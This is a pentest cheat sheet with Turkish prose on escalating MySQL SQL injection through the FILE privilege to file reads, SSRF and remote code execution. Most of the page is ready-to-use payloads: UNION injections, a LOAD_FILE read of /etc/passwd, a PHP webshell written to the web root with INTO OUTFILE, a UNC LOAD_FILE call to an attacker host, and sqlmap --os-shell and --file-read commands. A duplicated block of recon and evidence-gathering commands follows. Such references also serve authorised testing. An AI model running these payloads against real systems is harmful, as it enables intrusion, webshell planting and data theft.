Skip to content

MySQL File priv to SSRF/RCE

web sqli

MySQL File priv to SSRF/RCE SQL/Cypher sorgusuna kullanıcı girdisinin birleşmesiyle oluşur. Amaç: DBMS fingerprint, veri sızıntısı ve mümkünse OS/RCE yükseltmesi.

  1. Enjekte edilebilir parametreyi (GET/POST/JSON/header/cookie) izole et.

  2. Boolean/time/OAST ile DBMS ve tekniği doğrula.

  3. Veri okuma → dosya/OS komutuna yükselt.

  4. Kanıt paketle; pivot için credential çıkar.

' OR '1'='1
1' AND SLEEP(5)-- -
1' AND 1=CAST((SELECT version()) AS int)-- -
Terminal window
sqlmap -u 'https://TARGET/item?id=1' --batch --banner --current-user --current-db
Terminal window
ghauri -u 'https://TARGET/item?id=1' --dbs
1' UNION SELECT 1,@@version,user(),database()-- -
1' UNION SELECT 1,LOAD_FILE('/etc/passwd'),3-- -
1' UNION SELECT 1,'<?php system($_GET[c]); ?>',3 INTO OUTFILE '/var/www/html/shell.php'-- -
Terminal window
sqlmap -u 'https://TARGET/item?id=1' --file-read=/etc/passwd --batch
SELECT LOAD_FILE('\\\\ATTACKER\\share\\a');
SELECT ... INTO DUMPFILE '/var/lib/mysql-files/x.txt';
Terminal window
sqlmap -u 'https://TARGET/item?id=1' --os-shell --batch
slowlog / general_log webshell yazımı

MySQL File priv to SSRF/RCE sonuçları hedef sürüme ve yığına göre değişir. Her başarılı adımı request/response ile kaydet; sonraki pivot’u not et.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
nuclei -u https://TARGET -as -silent
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt

Bu ekler keşif ve kanıt paketini hızlandırır; asıl sömürü üstteki bölümlerdeki konu-özel payload’larla yapılır.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
curl -sk https://TARGET/sitemap.xml
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
Terminal window
nuclei -u https://TARGET -as -silent
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt
request/response
zaman damgası
kullanılan hesap
etki özeti
Terminal window
curl -sk https://TARGET/ -D evidence/web/headers.txt -o evidence/web/body.html